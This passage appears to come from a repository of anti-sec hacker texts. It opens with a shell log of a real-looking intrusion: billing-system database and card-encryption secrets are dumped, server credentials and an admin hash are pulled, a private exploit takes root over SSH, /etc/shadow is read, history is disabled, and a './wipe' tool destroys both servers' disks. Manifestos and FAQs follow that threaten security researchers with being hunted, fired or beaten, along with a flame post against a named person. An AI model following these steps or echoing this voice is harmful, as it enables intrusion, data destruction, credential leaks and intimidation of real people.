drwxrwx--- 10 billing billing 4096 Jul 2 21:43 mail
drwxr-xr-x 4 billing billing 4096 Nov 12 2008 .mozilla
drwxr-xr-x 3 billing billing 4096 Apr 29 2008 public_ftp
drwxr-x--- 24 billing nobody 4096 Jun 28 02:55 public_html
drwx------ 4 billing billing 4096 Jun 7 21:53 ssl
drwxr-xr-x 7 billing billing 4096 Feb 25 17:59 tmp
drwx------ 2 billing billing 4096 May 27 2008 .trash
lrwxrwxrwx 1 billing billing 11 Jun 2 01:58 www -> public_html
-rw-r--r-- 1 billing billing 658 May 27 2008 .zshrc
sh-3.2# cd www/
sh-3.2# ls
admin banned.php configuressl.php domainchecker.php init.php logout.php postinfo.html templates
viewticket.php whois.php
affiliates.php billing contact.php downloads installmingchowping modules _private templates_c _vti_bin
aff.php cart.php creditcard.php downloads.php knowledgebase.php networkissues.php register.php tutorials.php _vti_cnf
announcements.php cgi-bin dbconnect.php htaccess.txt lang networkissuesrss.php serverstatus.php upgrade
_vti_inf.html
announcementsrss.php clientarea.php display.php images libs order.php status upgrade.php _vti_log
announcements.xml configuration.php dl.php includes link.php passwordreminder.php submitticket.php viewemail.php _vti_pvt
attachments configuration.php.new dologin.php index.php login.php pipe supporttickets.php viewinvoice.php _vti_txt
sh-3.2# cat configuration.php
<?php
$license="93881365561d";
$db_host = "localhost";
$db_username = "billing_billusr";
$db_password = "X2qL6:qWCCb6";
$db_name = "billing_billing";
$cc_encryption_hash = "57jR9sVyPKcDvZ4Ppy4I56sjYLI6mmEjhPQJ1sEAqBw7O952JlkTlrAbzLLmTx9K";
$templates_compiledir = "templates_c/";
?>
sh-3.2# mysql
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 11021136
Server version: 5.0.81-community MySQL Community Edition (GPL)
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> use billing_billing;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+----------------------------+
| Tables_in_billing_billing |
+----------------------------+
| mod_ipmanager |
| mod_ipmonitor |
| tblaccounts |
| tblactivitylog |
| tbladdons |
| tbladminlog |
| tbladminperms |
| tbladminroles |
| tbladmins |
| tbladminsecurityquestions |
| tblaffiliates |
| tblaffiliatesaccounts |
| tblaffiliateshistory |
| tblaffiliatespending |
| tblaffiliateswithdrawals |
| tblannouncements |
| tblbannedemails |
| tblbannedips |
| tblbillableitems |
| tblbrowserlinks |
| tblcalendar |
| tblcancelrequests |
| tblclientgroups |
| tblclients |
| tblconfiguration |
| tblcontacts |
| tblcredit |
| tblcurrencies |
| tblcustomfields |
| tblcustomfieldsvalues |
| tbldomainpricing |
| tbldomains |
| tbldomainsadditionalfields |
| tbldownloadcats |
| tbldownloads |
| tblemails |
| tblemailtemplates |
| tblfraud |
| tblgatewaylog |
| tblhosting |
| tblhostingaddons |
| tblhostingconfigoptions |
| tblinvoiceitems |
| tblinvoices |
| tblknowledgebase |
| tblknowledgebasecats |
| tblknowledgebaselinks |
| tbllinks |
| tblnetworkissues |
| tblnotes |
| tblorders |
| tblpaymentgateways |
| tblpricing |
| tblproductconfiggroups |
| tblproductconfiglinks |
| tblproductconfigoptions |
| tblproductconfigoptionssub |
| tblproductgroups |
| tblproducts |
| tblpromotions |
| tblquoteitems |
| tblquotes |
| tblregistrars |
| tblservers |
| tblsslorders |
| tbltax |
| tblticketbreaklines |
| tblticketdepartments |
| tblticketescalations |
| tblticketlog |
| tblticketmaillog |
| tblticketnotes |
| tblticketpredefinedcats |
| tblticketpredefinedreplies |
| tblticketreplies |
| tbltickets |
| tblticketspamfilters |
| tbltodolist |
| tblupgrades |
| tblwhoislog |
+----------------------------+
80 rows in set (0.00 sec)
mysql> select name,ipaddress,hostname,username,password from tblservers;
+--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
| name | ipaddress | hostname | username | password |
+--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
| Osiris | 66.197.143.133 | Osiris.ssanz.net | ssanz | J4WILwNJpxR0KhyuPspLOT37zLzLrZ1wyqctabXg3co= |
| Osiris-Radio | 66.197.143.133 | Osiris.ssanz.net | root | +V876e3z7tGn9HXEcOG1TJVPaSsGbj31MnsZ2lw52buNutqcpfBhrPVsKdDssqrh7eDF8g== |
| Devil | 66.197.204.101 | devil.ssanz.net | root | n/a/WSvQJp/++la5CREbl9QijpppzdxP0GjijQRXst2nag9E9PuTVrRO3A== |
+--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
3 rows in set (0.00 sec)
mysql> select firstname,lastname,email,username,password from tbladmins;
+-----------+----------+-----------------+----------+----------------------------------+
| firstname | lastname | email | username | password |
+-----------+----------+-----------------+----------+----------------------------------+
| Logan | Douglas | Logan@ssanz.net | Admin | c6df529826cf16ac5bedb424d8ac972b |
+-----------+----------+-----------------+----------+----------------------------------+
1 row in set (0.06 sec)
mysql> quit
Bye
sh-3.2# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda5 2.0G 477M 1.4G 26% /
/dev/sda8 875G 147G 684G 18% /home
/dev/sda3 9.7G 6.8G 2.5G 74% /usr
/dev/sda2 9.7G 7.0G 2.3G 76% /var
/dev/sda1 99M 23M 72M 24% /boot
/dev/sda6 996M 64M 881M 7% /tmp
tmpfs 3.9G 0 3.9G 0% /dev/shm
/dev/sdb1 459G 163G 273G 38% /backup
sh-3.2# ./wipe
sh-3.2# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda5 64Z 64Z 1.5G 100% /
/dev/sda8 64Z 64Z 729G 100% /home
/dev/sda3 64Z 64Z 3.0G 100% /usr
/dev/sda2 64Z 64Z 3.0G 100% /var
/dev/sda1 16Z 16Z 0 100% /boot
/dev/sda6 64Z 64Z 933M 100% /tmp
tmpfs 3.9G 0 3.9G 0% /dev/shm
/dev/sdb1 64Z 64Z 296G 100% /backup
sh-3.2# exit
exit
-----------------------------------
osiris [ DOWN ]
devil [ UP ]
-----------------------------------
anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.204.101 -p 22
[+] 0wn0wn - anti-sec group
[+] Target: 66.197.204.101
[+] SSH Port: 22
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
sh-3.2# export HISTFILE=/dev/null
sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2# uname -a
Linux devil.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux
sh-3.2# head -n1 /etc/shadow
root:$1$BitobdhB$SAscpWG4O51UZQzxpBxbI1:14407:0:99999:7:::
sh-3.2# w
04:10:20 up 4 days, 12:11, 1 user, load average: 3.25, 2.09, 1.68
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 125.238.144.224 20:18 7:51m 6:38 6:38 htop
sh-3.2# pwd
/root
sh-3.2# ls -la
total 1232
drwxr-x--- 23 root root 4096 Jul 4 04:06 .
drwxr-xr-x 25 root root 4096 Jun 29 14:33 ..
-rw------- 1 root root 957 Jun 13 05:20 .accesshash
-rw------- 1 root root 937 Jun 12 00:01 anaconda-ks.cfg
-rw------- 1 root root 7258 Jun 30 10:03 .bash_history
-rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
-rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
-rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
drwxrwxrwx 3 1000 1000 4096 Jun 12 04:45 bwm-ng-0.6
-rw-r--r-- 1 root root 141564 Mar 1 2007 bwm-ng-0.6.tar.gz
drwxr-xr-x 3 root root 4096 Nov 5 2006 cmq
-rw-r--r-- 1 root root 14507 Oct 10 2008 cmq.tgz
drwxr-xr-x 4 root root 4096 Jun 12 02:51 .cpanel
drwxr-xr-x 4 root root 4096 Jun 12 03:26 cpanel3-skel
drwx------ 3 root root 4096 Jun 12 00:17 .cpobjcache
drwxr-xr-x 2 root root 4096 Aug 21 2006 cse
-rw-r--r-- 1 root root 12207 Oct 10 2008 cse.tgz
drwxr-xr-x 10 root root 4096 Jun 5 05:05 csf
-rw-r--r-- 1 root root 431490 Jun 5 10:52 csf.tgz
-rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
drwx------ 2 root root 4096 Jun 12 01:51 .elinks
-rw-r--r-- 1 root root 16 Jun 13 15:33 .forward
drwx------ 3 root root 4096 Jun 11 23:59 .gconf
drwx------ 2 root root 4096 Jun 11 23:59 .gconfd
drwxr-xr-x 4 root root 4096 Jun 12 04:29 .gem
drwx------ 2 root root 4096 Jun 12 01:53 .gnupg
drwxrwxrwx 6 1002 1002 4096 Jun 12 04:24 htop-0.8.1
-rw-r--r-- 1 root root 414870 Sep 23 2008 htop-0.8.1.tar.gz
-rw-r--r-- 1 root root 561 Jun 12 23:31 .htoprc
-rw-r--r-- 1 root root 4239 Jun 12 00:01 install.log.syslog
drwx------ 6 root root 4096 Jun 12 02:33 .MirrorSearch
-rw------- 1 root root 37 Jun 12 02:11 .my.cnf
drwxr-xr-x 3 1000 1000 4096 Jun 12 05:42 mytop-1.6
-rw-r--r-- 1 root root 19720 Feb 16 2007 mytop-1.6.tar.gz
-rw-r--r-- 1 root root 264 Jun 23 00:23 .pearrc
drwxr-xr-x 2 root root 4096 Jun 12 03:21 public_ftp
drwxr-xr-x 3 root root 4096 Jun 12 03:21 public_html
-rw------- 1 root root 1024 Jun 12 02:50 .rnd
drwx------ 3 root root 4096 Jun 12 02:41 .spamassassin
drwx------ 2 root root 4096 Jun 22 09:11 .ssh
-rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
drwxr-xr-x 3 root root 4096 Jun 12 02:40 tmp
drwxr-xr-x 2 root root 4096 Jun 16 19:23 .wapi
sh-3.2# cat .bash_history
sh hninst.sh
passwd
fdisk -l
exit
w
history
screen -ls
screen -r 2785.pts-0.devil
exit
wget http://merovingian.net.nz/htop-0.8.1.tar.gz
[snip]
csf -a 125.238.144.110
exit
cd /home
ls
wget http://visit4cash.net/backup-6.12.2009_06-46-12_visit4ca.tar.gz
[snip]
wget http://visit4cash.net/mainfiles.tar.gz
mv mainfiles.tar.gz /home/visit4ca/public_html
cd /home
cd visit4ca
cd public_html
ls
tar zxvf mainfiles.tar.gz
[snip]
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.38.206.233
csf --restart
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 118.94.59.33
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
[snip]
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Live/i686/Fedora-11-i686-Live.iso
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedora/x86_64/iso/Fedora-11-x86_64-DVD.iso
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedora/x86_64/iso/Fedora-11-x86_64-netinst.iso
sh-3.2# cat /etc/userdomains
advertising.ssanz.net: adserver
forums.visit4cash.net: forumsv4
megacashzone.com: megacash
visit4cash.net: visit4ca
seanone.com: seanonec
backup2.ssanz.net: backup2
*: nobody
sh-3.2# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda3 31G 7.5G 22G 26% /
/dev/sdb1 452G 35G 394G 9% /home
/dev/sda1 99M 23M 72M 24% /boot
tmpfs 495M 4.0K 495M 1% /dev/shm
/usr/tmpDSK 485M 14M 446M 3% /tmp
sh-3.2# who
root pts/0 2009-07-03 20:18 (125.238.144.224)
sh-3.2# ./wipe
sh-3.2# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda3 64Z 64Z 24G 100% /
/dev/sdb1 64Z 64Z 417G 100% /home
/dev/sda1 16Z 16Z 77M 100% /boot
tmpfs 495M 4.0K 495M 1% /dev/shm
/usr/tmpDSK 485M 14M 446M 3% /tmp
sh-3.2# exit
exit
-----------------------------------
osiris [ DOWN ]
devil [ DOWN ]
-----------------------------------
Once again, practice what you preach. Don't claim to be something you're not.
Most importantly, don't go after us. We're not the problem. What you say does
not align AT ALL with what you actually do with your servers.
Fix that first, you dig?
~ There will always be no way out.

223
anti-sec/txt/ats-policy.txt Normal file
View File

@ -0,0 +1,223 @@
~~~
~ Anti security "policy" v0.9 by anonymous
~ - Save the bugs!
~
~~~
-- This is my view and it does not fully speak for all the people
-- that are involved in anti security and it is subject to heavy change.
Content:
Introduction.
What is this policy?
Purpose of the policy.
Is this a joke ?
The policy.
Using the policy.
Contribute to the policy.
Thanks & reference.
[ Introduction ]
Hello.
This policy is designed to try to advocate a new a completly different
policy for the underground community that is designed for "anti disclosure"
basicly the opposite of full disclosure but with a few side notes that advocate
some disclosure of bug information but in general this is designed to be a
policy that people will read and think, "Hey.. this is the right thing!",
hopefully.
[ What is this policy ]
This policy is basicly a guideline.
It will demonstrate that it is not good to post bug/exploit information to
places like BUGTRAQ, packetstorm, other public forums. It will show that
most of the people that are excessively posting bugs to these public forums
are actually not doing it for security but quite the contrary for things
like fame, jobs, etc.
The policy will show you that if you are really interested in security
that there is a much better way of increasing security, because basicly
when you send a new bug and an exploit to a place like BUGTRAQ you are
actually decreasing security and potentially causing hundreds of thousands
of people high damage from when script kiddies use your bug/exploit to
break into their system.
It will demonstrate the best way to maintain the anti security policy
which is to keep bugs/exploits private within either a very small group
of trusted people that have the skill to understand what it is about or just
simply keep it for yourself. If however the exploit leaks you should contact
vendor and tell him about the bug. If the bug is discovered by someone else
or the vendor has fixed the problem you are free to post the exploit to a
non public forum, maybe your website.
Also it is essential to demonstrate that a person that is looking for security
bugs does so just for the sheer enjoyment and thrill, difficulty of finding
and obvious bug or a very difficult to find bug and then possible exploiting
it, after this has taken place he should carry on and start looking for other
bugs, ie: by auditing src code, doing protocol 'checks', reverse engineering
and using security logic. This is an important thing in this policy that needs
to be addressed. We do this because we love it!
[ Purpose of the policy ]
The purpose of this policy is to raise public awareness of a new way
of thinking in the security scene, it is written to try to help out
the anti security movement and to show interested people the best
way to be a part of the anti security movement, by using this policy.
One of the main reasons for this policy and what it is meant to address is the
need for none-disclosure, which is basicly because way too much stuff is
getting sent to BUGTRAQ and people like us really dont like it that way
and we hope that you wont like it either after studying anti security.
The purpose of this policy is to give people that are hackers a policy
that they can use to keep things private as they should remain and not
tempted by the dark side.
[ Is this a joke? ]
For some reason a lot of people think this is a joke, I've been asked about 4
times wether this whole anti security thing is a joke. And to answer your
question about this policy, No! It is not a joke we take this seriously but
we welcome any flames, comments or whatever that anyone might have.
[ The policy ]
The policy in a nutshell.
1. Do not tell the world about security bugs you find.
2. Do not release exploits to public forums.
3. If you are serious about security, notify only vendor.
4. If exploit leaks, notify vendor.
5. If bug becomes public, you are safe to release exploit to
a none public forum.
6. Never ever give bug or exploit information out on a bug/exploit
trusted to you by the discoverer/author of the bug/exploit. This
is basis for trust, do not give what you did not write!
This will demonstrate basicly the steps and scenarios that might
happen and how the policy is used in those steps, thus describing the
policy.
note: fiction ;>
Okay let's create a few variables.
HACKER = The person that wants to use the anti security policy
VENDOR = Company or group that wrote the program that HACKER found bug in
COMMUNITY = BUGTRAQ, PACKETSTORM, and the like.
Background:
HACKER is an avid auditer and finds a bug in bind-8.2.2-P7 a 1 byte overflow
which is pretty difficult to exploit but he manages, he writes an exploit
for this bug and he gives it to a very small amount of people, possible
people that are maybe in his group or that he trusts explicitly.
< scenario 1 >
HACKER who is a follower of the anti security policy does not notify the
community or the vendor and the bug lives on for many years, hopefully ;>
Causing little or no damage at all.
< scenario 2 >
HACKER is a TRUE security minded person, ie: someone that really cares
about security and is not the typical "hey I say I care about security
but what I really want is fame and a job". Allright this person who
also has hopefully read something about the anti security movement and
since he really apreciates security he should ONLY contact the vendor and
let them handle it.
< scenario 3 >
HACKER is a glory/fame seeker and he decides to post the bug to the
COMMUNITY. Ofcorse he says it is in the interest of full disclosure
and not fame and the like. He has read some full disclosure
policy and notifies vendor maybe 5 days before he releases the bug and
most likely the exploit too.
After the five days have passed, we must conclude that the vendor has issued
some sort of hotfix or a patch to fix the security problem and now the HACKER
sends the bug information, the exploit to the COMMUNITY and possible a
patch too.
Now has security been increased? Do you really think that most of COMMUNITY.
ie: the people that read BUGTRAQ want to patch their servers? No! It is
script kiddies that are waiting for the latest warez, as soon as HACKER
releases this new bug to the COMMUNITY thousands of script kiddies with
little or no skill will start breaking into hundreds of thousands
of boxes and if this bug were genuine, they would! And belive me lots of
boxes would get destroyed.
Now, I ask.. is this a good thing you are doing by posting to the COMMUNITY
all logic says NO!
< scenario 4 >
HACKER in this scenarion followed the anti security movement.
HACKER has had the exploit for a year or more and now for some strange
reason you hear rumors that script kiddies have the exploit. If these rumors
turn out to be correct you have an obligation to notify the vendor, so that
they can issue a patch, because this can cause just as much havoc as when
people post to the COMMUNITY
Q: Well what is the damn difference then?!? It is bound to leak someday.
A: Yes it happens much to often but there is alot of stuff out there
that has not leaked and the best way to not make things leak is too
not give to anyone at all. This however is not possible for some so
the best thing is to limit it to ONLY people that you trust 100 %.
And we hope that people that follow the anti security trend will
also realize a crucial point which is not to give what u didn't write!
Someone else has found the bug that HACKER found and has notified the
COMMUNITY and VENDOR. After this has happened HACKER is free to publish
his code on a non-public forum, like his personal website. This however is not
required at all.
[ Using the policy ]
Follow the guidelines that were outlined in previous sections, and remember
what keynotes.
[ Contribute to the policy ]
This policy is considered pre-beta and is subject to heavy change. We need
alot of help in adjusting this policy and so if you have any ideas about
things that are not clear and how to clear them up then please send us
that information. Also if you have things you would like to add/tweak
just send it.
[ Thanks and reference ]
This policy is written by anonymous and it will remain that way because
it is not supposed to portrait the views on a single person but of all
the people that follow this movement.
However certain groups and people deserve credit:
silent for starting anti security and doing most of the work.
jimjones for writing the great intro and FAQ!
RFP for writing a policy for the full disclosure people.
Everyone that has contributed so far!

92
anti-sec/txt/faq1.txt Normal file
View File

@ -0,0 +1,92 @@
THIS MOVEMENT IS APART OF THE ANTI-SEC / ANTI-WHITEHAT MOVEMENT.
THIS IS NOT A JOKE READ THE ENTIRE FUCKING FAQ.
THIS IS THE SIMPLE #PHRACK FAQ:
keep this in mind: when speaking of phrack "magazine" we mean that whitehat
magazine on phrack.org. also we use examples, but this applies to all people
and websites that fall into these categories.
1) what is a whitehat?
a) A WHITEHAT IS ANYONE WHO HELPS THE SECURITY INDUSTRY (POSTING BUGS/INFO ETC)
2) are there greyhats?
a) NO, ONCE A PERSON HAS THE EVIL WHITEHAT WAYS INSIDE OF THEM, THEY BECOME A PURE WHITEHAT, PLAIN AND SIMPLE.
3) how come "blackhats" are helping the security industry (bugtraq/phrack)?
a) THE SECURITY INDUSTRY INFECTS HACKERS WITH THESE EVIL THOUGHTS. THE
SECURITY INDUSTRY BRAINWASHES HACKERS TO WORK FOR THEM (BY PUBLISHING THIS
BUG/INFO/CODE INFORMATION). ALSO THESE PEOPLE ARE NOT BLACKHATS, THEY ARE
WHITEHATS BASED ON QUESTION #2. THE PROBLEM IS THAT THEY DO NOT REALIZE IT.
ALSO MOST OF THESE SO CALLED "BLACKHATS" DONT HACK. REAL HACKERS DO NOT
ACTUALLY PUBLICIZE SUCH INFORMATION (TO PHRACK BUGTRAQ ETC).
4) how is phrack a whitehat magazine?
a) EVERY TECHNIQUE THAT IS RELEASED IN PHRACK IS NOW REALIZED BY THE SECURITY
INDUSTRY. THE SEC INDUSTRY NOW SPENDS TIME TO THWART THESE TECHNIQUES.
ALSO, ALOT OF THE ARTICLES IN PHRACK DO NOT BENEFIT THE "HACKER SCENE"
AT ALL. HOW IS IT POSSIBLE THAT "POSITIVE" IDS ARTICLES OR HONEYPOT
KEYLOGGERS MAKE THERE WAY INTO A "for hackers by hackers" MAGAZINE?
5) what are people like spaf/chris rouland/lance then?
a) THEY ARE THE ENEMY. WHITEHATS = ENEMY.
6) im confused, i thought k2 is a blackhat but he helps with honeypot?
a) HES NOT A BLACKHAT, HES A BAD ROLE MODEL FOR ALL HACKERS. HE IS
BRAINWASHED BY THE SECURITY SCENE. IF HE CHANGES - GOOD FOR HIM. IF HE
CONTINUES HIS WAYS - HE WILL CONTINUE TO BE THE ENEMY.
7) i get what you're saying now, so like k2/duke/horizon/scut (for example)
aren't really hackers, they are just brainwashed by the security industry
to work for them?
a) THIS IS ABSOLUTELY FUCKING CORRECT.
8) so what am i supposed to do?
a) STOP MAKING ANY OF YOUR INFORMATION PUBLIC. BY INFORMATION WE MEAN
CODE,BUGS,TECHNIQUES ETC. KEEP THIS INFORMATION PRIVATE. DON'T TRADE
IT ON IRC. DON'T ENTRUST THIS INFORMATION INTO INDIVIDUALS YOU DONT
TRUST 100% (SOME PEOPLE TURN AROUND AND LEAK ALL YOUR SHIT OR THEY
END UP SELLING IT TO ISS). AND FOR FUCKS SAKE, TRY ACTUALLY USING
WHAT YOU CODE/FIND.
9) why do people like that whitehouse guy say "hackers shouldnt help criminals"
or "hackers should help security industry by responsibly disclosing bug
information to companies"?
a) THIS IS APART OF THE MASSIVE CAMPEIGN TO GET HACKERS TO WORK FOR THEM.
THE FACT IS THAT IF THE "HACKING SCENE" DOESNT HELP THE SECURITY INDUSTRY,
THEY WILL BECOME LOST BECAUSE THEY ARE A BUNCH OF COMPLETE IDIOTS. THE
BEST BUGS/INFORMATION IS USUALLY GIVEN TO THE SECURITY INDUSTRY BY PEOPLE
IN THE "HACK SCENE", AND THIS IS A FACT. IT MUST STOP.
10) how can i help?
a) HELP SPREAD THIS WAY OF THINKING TO EVERYONE YOU KNOW, ONCE PEOPLE REALIZE
THEY ARE BEING BRAINWASHED AND PROFITTED OFF OF, THEY WILL CHANGE. IF YOU
WANT TO MAKE A SIGNIFICANT CHANGE, START MAYBE THINKING ABOUT PROJECT MAYHEM.
11) ok, but like what if i dont want to change now? "lol"
a) YOU WILL BE HUNTED DOWN LIKE K2, DERAADT, DUGSONG, ETC. THE INTERNET
IS NO LONGER SAFE FOR WHITEHATS. NO LONGER SAFE FOR THE SECURITY INDUSTRY.
12) what should whitehats think of this movement?
a) WHITEHATS/SECURITY INDUSTRY PEOPLE SHOULD BE AFRAID OF THIS MOVEMENT.
IT SEEMS THAT HIGH MEMBERS OF THE SECURITY INDUSTRY HAVE ALREADY FALLEN
VICTIM TO THIS MOVEMENT. THEY SHOULD STOP PUBLICLY MAKING AVAILABLE
INFO SUCH AS "BUGS" OR "CODE" OR "TECHNIQUES". IF THEY DO NOT CHANGE
THEY WILL CONTINUE TO BE TARGETED, AND IT SUCKS TO GET OWNED/FIRED/
PHYSICALLY BEATEN.
13) why does #phrack like DMCA?
DMCA MAKES IT SO THAT PEOPLE CAN'T POST THESE BUGS/CODE ETC. READ UP
ON IT. IT WILL BE A GREAT WEAPON FOR THIS MOVEMENT ONCE IT STARTS
BEING ENFORCED ON A REGULAR BASIS.
14) ya ok, i think im going to change, this isn't some joke right?
a) NO IT ISN'T A JOKE. SECURITY INDUSTRY CANT SURVIVE AT ALL WITHOUT
THE SELLOUTS & BRAINWASHED SECTION OF THE HACKER SCENE. CHANGE YOUR
FUCKING WAYS. DONT POST. DONT HELP THE SECURITY INDUSTRY.
STOP... BEING.... BRAINWASHED......................
THE END: written in 25 minutes by the PHC, so dont bug us.

70
anti-sec/txt/faq2.txt Normal file
View File

@ -0,0 +1,70 @@
Ok, lately more and more people kept asking the same questions.. They forced me to write down this FAQ so, read it and then ask questions!
1. What the fuck is pr0j3kt m4yh3m i been hearing about?
Pr0j3kt m4yh3m is the movement started by a group of blackhats that decided
they can't bare anymore with the FUD and lies spread by the whitehat
community, with the greed that is definitory for IT security companies, with
the leeching performed by these companies on hackers and so on. Pr0j3kt
m4yh3m is carried on by multiple independant cells who accomplish project's
missions. This movement is not about terrorism but more about retaliation
and cyber guerilla warfare.
2. Why do you hate whitehats? Just because they earn money?
Heh, this one is a redundant question. It keeps repeating all the time. Now,
once and for all, we don't hate the whitehats because they earn money but
for the ways they earn those money. By lying, by spreading rumours, by
leeching on the underground that formed them. Them and IT companies are also
targeted because they lie clueless people regarding hackers. They make
hackers look as some sort of cyber terrorist that all he does is creating
panic amongst all sorts of internet habitants. They also say that hackers
can break into *ANY* machine connected to the internet, this ofcourse
creating panic and enlarging their market segment. They don't care about
security, all they do care about is money. They are evil! They leech their
employees, they leech the underground, they leech their clients. Figure out
for yourself.
3. Why are you guys against full disclosure?
Disclosure is, never the less, a bad thing. Figure it out: how many
classified informations from other domains are made public?! NONE, zero,
nada, nothing! But still, they promote the full disclosure in computer
security. Have you ever asked yourself why? It's not that they care for the
regular company that can't afford to hire a decent administrator... They
want publicity, they want media attention, all this resulting in material
benefits: if an IT security company makes public a proof-of-concept code or
an advisory, it performs two things. It gets fame for that (and ofcourse, a
larger market segment) and thousands of kiddies all over the world eventually
work out an exploit from the advisory. So, people would fear getting hacked
so, they would become customers of that IT security company. Remember this:
knowledge given is power lost. Why giving powerful weapons to the kids all
over?
4. Real blackhats stay in underground. Why did u come out front?
As we stated in 1., we just can't stand anymore seeing what the whitehat
community is doing. They almost killed the scene, breaking it in half.
Whitehats all over the world are brainwashing thousands and thousands of
people, making them share their mindset. As a result, people think that
blackhat equals script kiddie and hacker equals IT security researcher. This
is so wrong! Hackers hack! Most of whitehat knowledge originates from the
underground. Most of the stuff they publish is heard by them from the few
underground connections left. And yet, they try to kill this underground and
they call it "script kiddies". ~el8/PHC/other groups will carry on this war
forever, until something changes! More and more groups adhere to pr0j3kt
m4yh3m.
5. Is Pr0j3kt M4yh3m visible to us?
Hell yeah! Even if nobody knows the other cells, even if nobody knows what
others do, look around you: you see supposedly secured servers gettin
hacked, you see security professionals hacked proving that they are giving a
false sense of security. *EVERYTHING* aimed at harming security industry in
one way or the other is an action of pr0j3kt m4yh3m. Pr0j3kt's cells are
spread all over the world, one could even be in your neighbourhood so watch
out!

199
anti-sec/txt/hack4.txt Normal file
View File

@ -0,0 +1,199 @@
A PHC PRODUCTION: THE REAL SCRIPTKIDDIES
[Posted to the netsys.com 'full-disclosure' list.]
Does anyone find it strange that the talentless scriptkiddy Ron DuFresne is
banging on about "kids this" and "kids that"? I certainly do. This clueless
moron is in no position to speak down on or scold those he obviously knows
nothing about.
If you search google for his name, you can easily see the technically inept
scriptkiddy Ron DuFresne making a monkey out of himself:
http://www.google.com/search?q=%22Ron+DuFresne%22
This guy knows nothing beyond 1980's security policy construction and
point-and-click firewall operation. He makes many technical blunders in his
posts and displays an uncanny knack for sounding like a total dumbass.
For those out of the loop, the scriptkiddy Ron DuFresne was a former member
of the defacement group known as GForce Pakistan, albeit only for a month or
so at most. What's sad is that he has admitted this in the past, but
justifies it as some kind of adventure "for research purposes." He also
denies having defaced any websites. Still, makes you wonder, doesn't it?
I also see many other technically incompetent people/leeches on this list
who are making unqualified assertions that so-and-so are scriptkids, that
so-and-so don't know their stuff, that so-and-so are attention deprived...
If you can answer 'yes' to all of the questions below, then by all means
feel free to think of yourself as equal to or better than these ~el8 guys.
Otherwise, please stop speaking down to people who are obviously much more
technically skilled than your ignorance will ever allow you to be.
* Do you know how to program in C? Are you intimately familiar with ISO C89?
C99? While other people in your neighbourhood were out partying, were you
sitting at home in bed making an almost biblical study of the POSIX
standards? What about those from The Open Group?
* Do you know how to write hash tables? Balanced trees? Do you know the art
of algorithms? Do you know Knuth's work like the back of your hand? Did you
teach yourself everything about computers that one would otherwise only
learn by paying thousands of dollars for in Computer Science tuition?
* Do you know how to juggle assembly code in your head for multiple
architectures, such as MIPS, SPARC, x86? Do you understand the peculiarities
of each architecture down to the nittiest, grittiest details? Can you
optimize your own assembly routines? Can you take advantage of things such
as Pentium instruction pairing or the delay slots in various RISC
architectures? Do you understand the deal with the I-Cache on MIPS? Are you
fluent in assembly language? Hell, do you even know what SPARC stands for?
Quadrants in PA-RISC, make sense?
* Do you know how to write your own exploits? Do you know how to audit
software with surgical precision for the most intricate bugs imaginable? Do
you know how to take advantage of buffer overflows? Do you know how to
exploit off-by-one errors on a little-endian machine? Do you know about
integer overflows and signedness issues? Can you exploit format string
vulnerabilities? Can you gain control of a process vulnerable to a heap
overflow via a deep knowledge of the malloc implementation on the target
host? Do you know how to bypass the "security" afforded by crap like
Openwall, StackGuard, PaX? Or is your knowledge of these things limited to
the papers that non-hackers publish? You probably think the people trying to
help the security community with bullshit patches/fixes like this are
hackers, when in fact no hacker would ever publish any such thing that aims
to improve security.
* Have you studied the UNIX kernel with as much fervour as some would have
